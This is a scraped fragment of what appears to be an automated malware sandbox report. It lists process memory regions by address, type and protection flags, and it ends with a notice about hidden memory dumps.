|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
82D4000
|
heap
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
AC06000
|
direct allocation
|
page execute and read and write
|
||
|
6F81000
|
heap
|
page read and write
|
||
|
24860000
|
trusted library allocation
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
474000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
240D4000
|
trusted library allocation
|
page read and write
|
||
|
66D0000
|
heap
|
page read and write
|
||
|
4A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
24EA0000
|
trusted library allocation
|
page read and write
|
||
|
21B6E000
|
stack
|
page read and write
|
||
|
30D0000
|
trusted library allocation
|
page read and write
|
||
|
742E000
|
stack
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page read and write
|
||
|
5A79000
|
trusted library allocation
|
page read and write
|
||
|
66D7000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
6AA000
|
heap
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
6BC5000
|
heap
|
page execute and read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
847E000
|
stack
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
337C000
|
stack
|
page read and write
|
||
|
7F04000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
24E80000
|
trusted library allocation
|
page read and write
|
||
|
3AD6000
|
remote allocation
|
page execute and read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
24860000
|
trusted library allocation
|
page read and write
|
||
|
21DDE000
|
stack
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
24570000
|
trusted library allocation
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
24130000
|
heap
|
page read and write
|
||
|
8180000
|
heap
|
page read and write
|
||
|
21F1E000
|
stack
|
page read and write
|
||
|
21FF5000
|
trusted library allocation
|
page read and write
|
||
|
47D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E06000
|
direct allocation
|
page execute and read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
240DE000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24E6E000
|
stack
|
page read and write
|
||
|
21E30000
|
heap
|
page read and write
|
||
|
480000
|
trusted library allocation
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
5FC000
|
stack
|
page read and write
|
||
|
49A000
|
trusted library allocation
|
page execute and read and write
|
||
|
746D000
|
stack
|
page read and write
|
||
|
72D7000
|
trusted library allocation
|
page read and write
|
||
|
21DA0000
|
remote allocation
|
page read and write
|
||
|
24450000
|
trusted library allocation
|
page read and write
|
||
|
24450000
|
trusted library allocation
|
page read and write
|
||
|
A85000
|
heap
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
unkown
|
page readonly
|
||
|
B606000
|
direct allocation
|
page execute and read and write
|
||
|
AE0000
|
trusted library section
|
page read and write
|
||
|
21FF3000
|
trusted library allocation
|
page read and write
|
||
|
21C7E000
|
stack
|
page read and write
|
||
|
42B000
|
unkown
|
page read and write
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
7220000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
8242000
|
heap
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
8CFD000
|
stack
|
page read and write
|
||
|
6B70000
|
direct allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
2DFC000
|
stack
|
page read and write
|
||
|
24860000
|
trusted library allocation
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
460000
|
trusted library allocation
|
page read and write
|
||
|
7F568000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EE000
|
heap
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D0E000
|
stack
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page read and write
|
There are 535 hidden memdumps, click here to show them.